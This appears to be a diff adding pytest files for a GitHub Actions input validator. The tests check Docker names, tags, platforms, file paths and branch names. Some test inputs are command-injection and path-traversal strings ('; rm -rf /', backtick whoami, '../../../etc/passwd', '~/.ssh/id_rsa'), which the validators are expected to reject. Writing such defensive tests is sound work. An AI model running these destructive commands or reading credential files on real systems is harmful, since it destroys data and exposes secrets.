assert validator.validate_inputs(inputs) is False
assert validator.has_errors()
# Test scan and sign settings
validator.clear_errors()
inputs = {
"registry": "dockerhub",
"scan-image": "true",
"sign-image": "false",
}
assert validator.validate_inputs(inputs) is True
assert not validator.has_errors()
# Test invalid registry value
validator.clear_errors()
inputs = {
"registry": "invalid-registry-123",
}
assert validator.validate_inputs(inputs) is False
assert validator.has_errors()
def test_custom_validator_error_propagation(self):
"""Test that errors from sub-validators propagate correctly."""
registry = ValidatorRegistry()
# Test sync-labels with invalid token
validator = registry.get_validator("sync-labels")
validator.clear_errors()
inputs = {
"labels": ".github/labels.yml",
"token": "invalid-token-format",
}
assert validator.validate_inputs(inputs) is False
# Should have error from token validator
assert validator.has_errors()
# Test docker-build with injection attempt
validator = registry.get_validator("docker-build")
validator.clear_errors()
inputs = {
"context": ".",
"build-args": "ARG1=value1\nARG2=; rm -rf /",
}
assert validator.validate_inputs(inputs) is False
errors = str(validator.errors).lower()
assert "injection" in errors or "security" in errors
def test_custom_validators_github_expressions(self):
"""Test that custom validators handle GitHub expressions correctly."""
registry = ValidatorRegistry()
# All custom validators should accept GitHub expressions
test_cases = [
(
"sync-labels",
{
"labels": "${{ github.workspace }}/.github/labels.yml",
"token": "${{ secrets.GITHUB_TOKEN }}",
},
),
(
"docker-build",
{
"context": "${{ github.workspace }}",
"dockerfile": "${{ inputs.dockerfile }}",
"tag": "${{ steps.meta.outputs.tags }}",
},
),
(
"codeql-analysis",
{
"language": "${{ matrix.language }}",
"queries": "${{ inputs.queries }}",
},
),
(
"docker-publish",
{
"registry": "${{ vars.REGISTRY }}",
"platforms": "${{ steps.platforms.outputs.list }}",
},
),
]
for action_type, inputs in test_cases:
validator = registry.get_validator(action_type)
validator.clear_errors()
# Add required fields if needed
if action_type == "docker-build":
inputs["context"] = inputs.get("context", ".")
elif action_type == "codeql-analysis":
inputs["language"] = inputs.get("language", "javascript")
assert validator.validate_inputs(inputs) is True
assert not validator.has_errors(), f"Failed for {action_type}: {validator.errors}"

83
validate-inputs/tests/test_docker-build_custom.py Normal file
View File

@@ -0,0 +1,83 @@
"""Tests for docker-build custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "docker-build"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomDockerBuildValidator:
"""Test cases for docker-build custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("docker-build")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for docker-build
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for docker-build
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for docker-build
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for docker-build
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_docker_specific_validation(self):
"""Test Docker-specific validation."""
inputs = {
"image": "myapp:latest",
"platforms": "linux/amd64,linux/arm64",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

83
validate-inputs/tests/test_docker-publish-gh_custom.py Normal file
View File

@@ -0,0 +1,83 @@
"""Tests for docker-publish-gh custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "docker-publish-gh"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomDockerPublishGhValidator:
"""Test cases for docker-publish-gh custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("docker-publish-gh")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for docker-publish-gh
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for docker-publish-gh
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for docker-publish-gh
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for docker-publish-gh
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_docker_specific_validation(self):
"""Test Docker-specific validation."""
inputs = {
"image": "myapp:latest",
"platforms": "linux/amd64,linux/arm64",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

83
validate-inputs/tests/test_docker-publish-hub_custom.py Normal file
View File

@@ -0,0 +1,83 @@
"""Tests for docker-publish-hub custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "docker-publish-hub"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomDockerPublishHubValidator:
"""Test cases for docker-publish-hub custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("docker-publish-hub")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for docker-publish-hub
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for docker-publish-hub
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for docker-publish-hub
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for docker-publish-hub
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_docker_specific_validation(self):
"""Test Docker-specific validation."""
inputs = {
"image": "myapp:latest",
"platforms": "linux/amd64,linux/arm64",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

83
validate-inputs/tests/test_docker-publish_custom.py Normal file
View File

@@ -0,0 +1,83 @@
"""Tests for docker-publish custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "docker-publish"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomDockerPublishValidator:
"""Test cases for docker-publish custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("docker-publish")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for docker-publish
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for docker-publish
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for docker-publish
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for docker-publish
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_docker_specific_validation(self):
"""Test Docker-specific validation."""
inputs = {
"image": "myapp:latest",
"platforms": "linux/amd64,linux/arm64",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

47
validate-inputs/tests/test_docker.py Normal file
View File

@@ -0,0 +1,47 @@
"""Tests for docker validator.
Generated by generate-tests.py - Do not edit manually.
"""
from validators.docker import DockerValidator
class TestDockerValidator:
"""Test cases for DockerValidator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = DockerValidator("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_valid_image_names(self):
"""Test valid Docker image names."""
assert self.validator.validate_image_name("myapp") is True
assert self.validator.validate_image_name("my-app_v2") is True
assert (
self.validator.validate_image_name("registry.example.com/myapp") is True
) # Registry paths supported
def test_valid_tags(self):
"""Test valid Docker tags."""
assert self.validator.validate_tag("latest") is True
assert self.validator.validate_tag("v1.2.3") is True
assert self.validator.validate_tag("feature-branch-123") is True
def test_valid_platforms(self):
"""Test valid Docker platforms."""
assert self.validator.validate_architectures("linux/amd64") is True
assert self.validator.validate_architectures("linux/arm64,linux/arm/v7") is True
def test_invalid_platforms(self):
"""Test invalid Docker platforms."""
assert self.validator.validate_architectures("windows/amd64") is False
assert self.validator.validate_architectures("invalid/platform") is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_image_name("${{ env.IMAGE_NAME }}") is True
assert self.validator.validate_tag("${{ steps.meta.outputs.tags }}") is True

283
validate-inputs/tests/test_docker_validator.py Normal file
View File

@@ -0,0 +1,283 @@
"""Tests for the DockerValidator module."""
from pathlib import Path
import sys
# Add the parent directory to the path
sys.path.insert(0, str(Path(__file__).parent.parent))
from validators.docker import DockerValidator
class TestDockerValidator:
"""Test cases for DockerValidator."""
def setup_method(self):
"""Set up test environment."""
self.validator = DockerValidator()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.errors == []
rules = self.validator.get_validation_rules()
assert "image_name" in rules
assert "tag" in rules
assert "architectures" in rules
def test_validate_docker_image_valid(self):
"""Test Docker image name validation with valid names.
Tests comprehensive Docker image name formats including simple names,
names with separators, and full registry paths.
"""
valid_names = [
# Simple names
"myapp",
"app123",
"nginx",
"ubuntu",
"node",
"python",
# Names with separators
"my-app",
"my_app",
"my.app", # Dots allowed (regression test for \. fix)
"my-app_v2", # Mixed separators
"app.with.dots", # Multiple dots in image name (regression test)
# Registry paths (dots in domain names)
"registry.example.com/myapp", # Registry with dots and namespace
"docker.io/library/nginx", # Multi-part registry path
"ghcr.io/owner/repo", # GitHub Container Registry
"gcr.io/project-id/image", # Google Container Registry
"quay.io/organization/app", # Quay.io registry
"harbor.example.com/project/image", # Harbor registry
"nexus.company.local/docker/app", # Nexus registry
# Complex paths with dots
"my.registry.local/app.name", # Dots in both registry and image
"registry.example.com/namespace/app.name", # Complex path with dots
"gcr.io/my-project/my.app.name", # GCR with dots in image
# Multiple namespace levels
"registry.io/org/team/project/app", # Deep namespace hierarchy
]
for name in valid_names:
self.validator.errors = []
result = self.validator.validate_docker_image_name(name)
assert result is True, f"Should accept image name: {name}"
def test_validate_docker_image_invalid(self):
"""Test Docker image name validation with invalid names."""
invalid_names = [
# Uppercase not allowed
"MyApp",
"NGINX",
"Ubuntu",
# Spaces not allowed
"my app",
"app name",
# Invalid separators/positions
"-myapp", # Leading dash
"myapp-", # Trailing dash
"_myapp", # Leading underscore
"myapp_", # Trailing underscore
".myapp", # Leading dot
"myapp.", # Trailing dot
# Note: Double dash (app--name) and double underscore (app__name) are allowed by Docker
# Invalid paths
"/myapp", # Leading slash
"myapp/", # Trailing slash
"registry/", # Trailing slash after registry
"/registry/app", # Leading slash
"registry//app", # Double slash
# Special characters
"app@latest", # @ not allowed in name
"app:tag", # : not allowed in name
"app#1", # # not allowed
"app$name", # $ not allowed
# Empty or whitespace
"", # Empty (may be optional)
" ", # Whitespace only
]
for name in invalid_names:
self.validator.errors = []
result = self.validator.validate_docker_image_name(name)
if name == "" or name.strip() == "": # Empty might be allowed (optional field)
assert isinstance(result, bool), f"Empty/whitespace handling for: {name}"
else:
assert result is False, f"Should reject image name: {name}"
def test_validate_docker_tag_valid(self):
"""Test Docker tag validation with valid tags."""
valid_tags = [
"latest",
"v1.0.0",
"1.0.0",
"main",
"master",
"develop",
"feature-branch",
"release-1.0",
"2024.3.1",
"alpha",
"beta",
"rc1",
"stable",
"edge",
]
for tag in valid_tags:
self.validator.errors = []
result = self.validator.validate_docker_tag(tag)
assert result is True, f"Should accept tag: {tag}"
def test_validate_docker_tag_invalid(self):
"""Test Docker tag validation with invalid tags."""
invalid_tags = [
"", # Empty tag
"my tag", # Space not allowed
"tag@latest", # @ not allowed
"tag#1", # # not allowed
":tag", # Leading colon
"tag:", # Trailing colon
]
for tag in invalid_tags:
self.validator.errors = []
result = self.validator.validate_docker_tag(tag)
# Some characters might be valid in Docker tags depending on implementation
if tag == "" or " " in tag:
assert result is False, f"Should reject tag: {tag}"
else:
# Other tags might be valid depending on Docker's rules
assert isinstance(result, bool)
def test_validate_architectures_valid(self):
"""Test architecture validation with valid values."""
valid_archs = [
"linux/amd64",
"linux/arm64",
"linux/arm/v7",
"linux/arm/v6",
"linux/386",
"linux/ppc64le",
"linux/s390x",
"linux/amd64,linux/arm64", # Multiple architectures
"linux/amd64,linux/arm64,linux/arm/v7", # Three architectures
]
for arch in valid_archs:
self.validator.errors = []
result = self.validator.validate_architectures(arch)
assert result is True, f"Should accept architecture: {arch}"
def test_validate_architectures_invalid(self):
"""Test architecture validation with invalid values."""
invalid_archs = [
"windows/amd64", # Windows not typically supported in Docker build
"linux/invalid", # Invalid architecture
"amd64", # Missing OS prefix
"linux", # Missing architecture
"linux/", # Incomplete
"/amd64", # Missing OS
"linux/amd64,", # Trailing comma
",linux/arm64", # Leading comma
]
for arch in invalid_archs:
self.validator.errors = []
result = self.validator.validate_architectures(arch)
assert result is False, f"Should reject architecture: {arch}"
def test_validate_namespace_with_lookahead_valid(self):
"""Test namespace validation with lookahead."""
valid_namespaces = [
"user",
"my-org",
"company123",
"docker",
"library",
"test-namespace",
"a" * 30, # Long but valid
]
for namespace in valid_namespaces:
self.validator.errors = []
result = self.validator.validate_namespace_with_lookahead(namespace)
assert result is True, f"Should accept namespace: {namespace}"
def test_validate_namespace_with_lookahead_invalid(self):
"""Test namespace validation with invalid values."""
invalid_namespaces = [
"", # Empty
"user-", # Trailing dash
"-user", # Leading dash
"user--name", # Double dash
"User", # Uppercase
"user name", # Space
"a" * 256, # Too long
]
for namespace in invalid_namespaces:
self.validator.errors = []
result = self.validator.validate_namespace_with_lookahead(namespace)
if namespace == "":
# Empty might be allowed
assert isinstance(result, bool)
else:
assert result is False, f"Should reject namespace: {namespace}"
def test_validate_prefix_valid(self):
"""Test prefix validation with valid values."""
valid_prefixes = [
"", # Empty prefix is often valid
"v",
"version-",
"release-",
"tag_",
"prefix.",
"1.0.",
]
for prefix in valid_prefixes:
self.validator.errors = []
result = self.validator.validate_prefix(prefix)
assert result is True, f"Should accept prefix: {prefix}"
def test_validate_prefix_invalid(self):
"""Test prefix validation with invalid values."""
invalid_prefixes = [
"pre fix", # Space not allowed
"prefix@", # @ not allowed
"prefix#", # # not allowed
"prefix:", # : not allowed
]
for prefix in invalid_prefixes:
self.validator.errors = []
result = self.validator.validate_prefix(prefix)
assert result is False, f"Should reject prefix: {prefix}"
def test_validate_inputs_docker_keywords(self):
"""Test validation of inputs with Docker-related keywords."""
inputs = {
"image": "myapp",
"tag": "v1.0.0",
"dockerfile": "Dockerfile",
"context": ".",
"platforms": "linux/amd64,linux/arm64",
"registry": "docker.io",
"namespace": "myorg",
"prefix": "v",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_empty_values_handling(self):
"""Test that empty values are handled appropriately."""
# Some Docker fields might be required, others optional
assert isinstance(self.validator.validate_docker_image_name(""), bool)
assert isinstance(self.validator.validate_docker_tag(""), bool)
assert isinstance(self.validator.validate_architectures(""), bool)
assert isinstance(self.validator.validate_prefix(""), bool)

74
validate-inputs/tests/test_eslint-check_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for eslint-check custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "eslint-check"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomEslintCheckValidator:
"""Test cases for eslint-check custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("eslint-check")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for eslint-check
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for eslint-check
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for eslint-check
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for eslint-check
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

283
validate-inputs/tests/test_file.py Normal file
View File

@@ -0,0 +1,283 @@
"""Tests for file validator."""
from validators.file import FileValidator
class TestFileValidator:
"""Test cases for FileValidator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = FileValidator("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.action_type == "test-action"
def test_get_required_inputs(self):
"""Test getting required inputs."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
def test_get_validation_rules(self):
"""Test getting validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
def test_validate_inputs_empty(self):
"""Test validation with empty inputs."""
result = self.validator.validate_inputs({})
assert result is True
def test_valid_file_paths(self):
"""Test valid file paths."""
assert self.validator.validate_file_path("./src/main.py") is True
assert self.validator.validate_file_path("relative/path.yml") is True
assert self.validator.validate_file_path("./config/file.txt") is True
def test_absolute_paths_rejected(self):
"""Test that absolute paths are rejected for security."""
assert self.validator.validate_file_path("/absolute/path/file.txt") is False
assert self.validator.has_errors()
def test_path_traversal_detection(self):
"""Test path traversal detection."""
assert self.validator.validate_file_path("../../../etc/passwd") is False
assert self.validator.validate_file_path("./valid/../../../etc/passwd") is False
assert self.validator.has_errors()
def test_validate_path_empty(self):
"""Test that empty paths are allowed (optional)."""
assert self.validator.validate_path("") is True
def test_validate_path_valid_skipped(self):
"""Test validation of valid paths (requires file to exist)."""
# validate_path requires strict=True so file must exist
# Skipping this test as it would need actual files
def test_validate_path_dangerous_characters(self):
"""Test rejection of dangerous characters in paths."""
dangerous_paths = [
"file;rm -rf /",
"file`whoami`",
"file$var",
"file&background",
"file|pipe",
]
for path in dangerous_paths:
self.validator.clear_errors()
assert self.validator.validate_path(path) is False
assert self.validator.has_errors()
# Branch name validation tests
def test_validate_branch_name_valid(self):
"""Test validation of valid branch names."""
valid_branches = [
"main",
"develop",
"feature/new-feature",
"bugfix/issue-123",
"release-1.0.0",
]
for branch in valid_branches:
assert self.validator.validate_branch_name(branch) is True
self.validator.clear_errors()
def test_validate_branch_name_empty(self):
"""Test that empty branch name is allowed (optional)."""
assert self.validator.validate_branch_name("") is True
def test_validate_branch_name_invalid_chars(self):
"""Test rejection of invalid characters in branch names."""
invalid_branches = [
"branch with spaces",
"branch@invalid",
"branch#invalid",
"branch~invalid",
]
for branch in invalid_branches:
self.validator.clear_errors()
assert self.validator.validate_branch_name(branch) is False
assert self.validator.has_errors()
def test_validate_branch_name_invalid_start(self):
"""Test rejection of branches starting with invalid characters."""
assert self.validator.validate_branch_name("-invalid") is False
assert self.validator.validate_branch_name(".invalid") is False
def test_validate_branch_name_invalid_end(self):
"""Test rejection of branches ending with invalid characters."""
assert self.validator.validate_branch_name("invalid.") is False
assert self.validator.has_errors()
self.validator.clear_errors()
assert self.validator.validate_branch_name("invalid/") is False
assert self.validator.has_errors()
# File extensions validation tests
def test_validate_file_extensions_valid(self):
"""Test validation of valid file extensions (must start with dot)."""
assert self.validator.validate_file_extensions(".py,.js,.ts") is True
assert self.validator.validate_file_extensions(".yml,.yaml,.json") is True
def test_validate_file_extensions_empty(self):
"""Test that empty extensions list is allowed."""
assert self.validator.validate_file_extensions("") is True
def test_validate_file_extensions_with_dots(self):
"""Test extensions with leading dots."""
assert self.validator.validate_file_extensions(".py,.js,.ts") is True
def test_validate_file_extensions_invalid_chars(self):
"""Test rejection of invalid characters in extensions."""
assert self.validator.validate_file_extensions("py;rm -rf /") is False
assert self.validator.has_errors()
# YAML file validation tests
def test_validate_yaml_file_valid(self):
"""Test validation of valid YAML file paths."""
assert self.validator.validate_yaml_file("config.yml") is True
assert self.validator.validate_yaml_file("config.yaml") is True
assert self.validator.validate_yaml_file("./config/settings.yml") is True
def test_validate_yaml_file_invalid_extension(self):
"""Test rejection of non-YAML files."""
assert self.validator.validate_yaml_file("config.txt") is False
assert self.validator.has_errors()
def test_validate_yaml_file_empty(self):
"""Test that empty YAML path is allowed (optional)."""
assert self.validator.validate_yaml_file("") is True
# JSON file validation tests
def test_validate_json_file_valid(self):
"""Test validation of valid JSON file paths."""
assert self.validator.validate_json_file("data.json") is True
assert self.validator.validate_json_file("./config/settings.json") is True
def test_validate_json_file_invalid_extension(self):
"""Test rejection of non-JSON files."""
assert self.validator.validate_json_file("data.txt") is False
assert self.validator.has_errors()
def test_validate_json_file_empty(self):
"""Test that empty JSON path is allowed (optional)."""
assert self.validator.validate_json_file("") is True
# Config file validation tests
def test_validate_config_file_valid(self):
"""Test validation of valid config file paths."""
valid_configs = [
"config.yml",
"config.yaml",
"config.json",
"config.toml",
"config.ini",
"config.conf",
"config.xml",
]
for config in valid_configs:
assert self.validator.validate_config_file(config) is True
self.validator.clear_errors()
def test_validate_config_file_invalid_extension(self):
"""Test rejection of invalid config file extensions."""
assert self.validator.validate_config_file("config.txt") is False
assert self.validator.has_errors()
def test_validate_config_file_empty(self):
"""Test that empty config path is allowed (optional)."""
assert self.validator.validate_config_file("") is True
# Dockerfile validation tests
def test_validate_dockerfile_path_valid(self):
"""Test validation of valid Dockerfile paths."""
valid_dockerfiles = [
"Dockerfile",
"Dockerfile.prod",
"docker/Dockerfile",
"./build/Dockerfile",
]
for dockerfile in valid_dockerfiles:
assert self.validator.validate_dockerfile_path(dockerfile) is True
self.validator.clear_errors()
def test_validate_dockerfile_path_invalid_name(self):
"""Test rejection of names not containing 'dockerfile'."""
assert self.validator.validate_dockerfile_path("build.txt") is False
assert self.validator.has_errors()
def test_validate_dockerfile_path_empty(self):
"""Test that empty Dockerfile path is allowed (optional)."""
assert self.validator.validate_dockerfile_path("") is True
# Executable file validation tests
def test_validate_executable_file_valid(self):
"""Test validation of valid executable paths."""
valid_executables = [
"./scripts/build.sh",
"bin/deploy",
"./tools/script.py",
]
for executable in valid_executables:
assert self.validator.validate_executable_file(executable) is True
self.validator.clear_errors()
def test_validate_executable_file_absolute_path(self):
"""Test rejection of absolute paths for executables."""
assert self.validator.validate_executable_file("/bin/bash") is False
assert self.validator.has_errors()
def test_validate_executable_file_empty(self):
"""Test that empty executable path is allowed (optional)."""
assert self.validator.validate_executable_file("") is True
# Required file validation tests
def test_validate_required_file_with_path(self):
"""Test required file validation with a path."""
# Path validation (no existence check in validation)
assert self.validator.validate_required_file("./src/main.py") is True
def test_validate_required_file_empty(self):
"""Test that required file cannot be empty."""
assert self.validator.validate_required_file("") is False
assert self.validator.has_errors()
def test_validate_required_file_dangerous_path(self):
"""Test rejection of dangerous paths for required files."""
assert self.validator.validate_required_file("../../../etc/passwd") is False
assert self.validator.has_errors()
# GitHub expressions tests
def test_github_expressions(self):
"""Test GitHub expression handling in various validators."""
github_expr = "${{ github.workspace }}/file.txt"
assert self.validator.validate_file_path(github_expr) is True
assert self.validator.validate_yaml_file("${{ inputs.config_file }}") is True
# Only file_path and yaml_file check for GitHub expressions first
# Other validators (config, json, branch_name) don't have GitHub expression support
# Integration tests
def test_validate_inputs_multiple_fields(self):
"""Test validation with multiple file inputs."""
inputs = {
"config-file": "config.yml",
"data-file": "data.json",
"branch": "main",
}
result = self.validator.validate_inputs(inputs)
assert result is True
def test_validate_inputs_with_errors(self):
"""Test validation with invalid inputs."""
inputs = {
"yaml-file": "file.txt",
"branch": "invalid branch name",
}
# This should pass as validate_inputs doesn't specifically handle these
# unless they're in a rules file
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)

205
validate-inputs/tests/test_file_validator.py Normal file
View File

@@ -0,0 +1,205 @@
"""Tests for the FileValidator module."""
from pathlib import Path
import sys
import pytest # pylint: disable=import-error
# Add the parent directory to the path
sys.path.insert(0, str(Path(__file__).parent.parent))
from validators.file import FileValidator
from tests.fixtures.version_test_data import FILE_PATH_INVALID, FILE_PATH_VALID
class TestFileValidator:
"""Test cases for FileValidator."""
def setup_method(self):
"""Set up test environment."""
self.validator = FileValidator()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.errors == []
rules = self.validator.get_validation_rules()
assert rules is not None
@pytest.mark.parametrize("path,description", FILE_PATH_VALID)
def test_validate_file_path_valid(self, path, description):
"""Test file path validation with valid paths."""
self.validator.errors = []
result = self.validator.validate_file_path(path)
assert result is True, f"Failed for {description}: {path}"
assert len(self.validator.errors) == 0
@pytest.mark.parametrize("path,description", FILE_PATH_INVALID)
def test_validate_file_path_invalid(self, path, description):
"""Test file path validation with invalid paths."""
self.validator.errors = []
result = self.validator.validate_file_path(path)
assert result is False, f"Should fail for {description}: {path}"
assert len(self.validator.errors) > 0
def test_validate_path_security(self):
"""Test that path traversal attempts are blocked."""
dangerous_paths = [
"../etc/passwd",
"../../etc/shadow",
"../../../root/.ssh/id_rsa",
"..\\windows\\system32",
"/etc/passwd", # Absolute path
"C:\\Windows\\System32", # Windows absolute
"~/.ssh/id_rsa", # Home directory expansion
]
for path in dangerous_paths:
self.validator.errors = []
result = self.validator.validate_path_security(path)
assert result is False, f"Should block dangerous path: {path}"
assert len(self.validator.errors) > 0
def test_validate_dockerfile_path(self):
"""Test Dockerfile path validation."""
valid_dockerfiles = [
"Dockerfile",
"dockerfile",
"Dockerfile.prod",
"Dockerfile.dev",
"docker/Dockerfile",
"./Dockerfile",
]
for path in valid_dockerfiles:
self.validator.errors = []
result = self.validator.validate_dockerfile_path(path)
assert result is True, f"Should accept Dockerfile: {path}"
def test_validate_yaml_file(self):
"""Test YAML file validation."""
valid_yaml_files = [
"config.yml",
"config.yaml",
"values.yaml",
".github/workflows/test.yml",
"docker-compose.yml",
"docker-compose.yaml",
]
for path in valid_yaml_files:
self.validator.errors = []
result = self.validator.validate_yaml_file(path)
assert result is True, f"Should accept YAML file: {path}"
invalid_yaml_files = [
"config.txt", # Wrong extension
"config", # No extension
"config.yml.txt", # Double extension
]
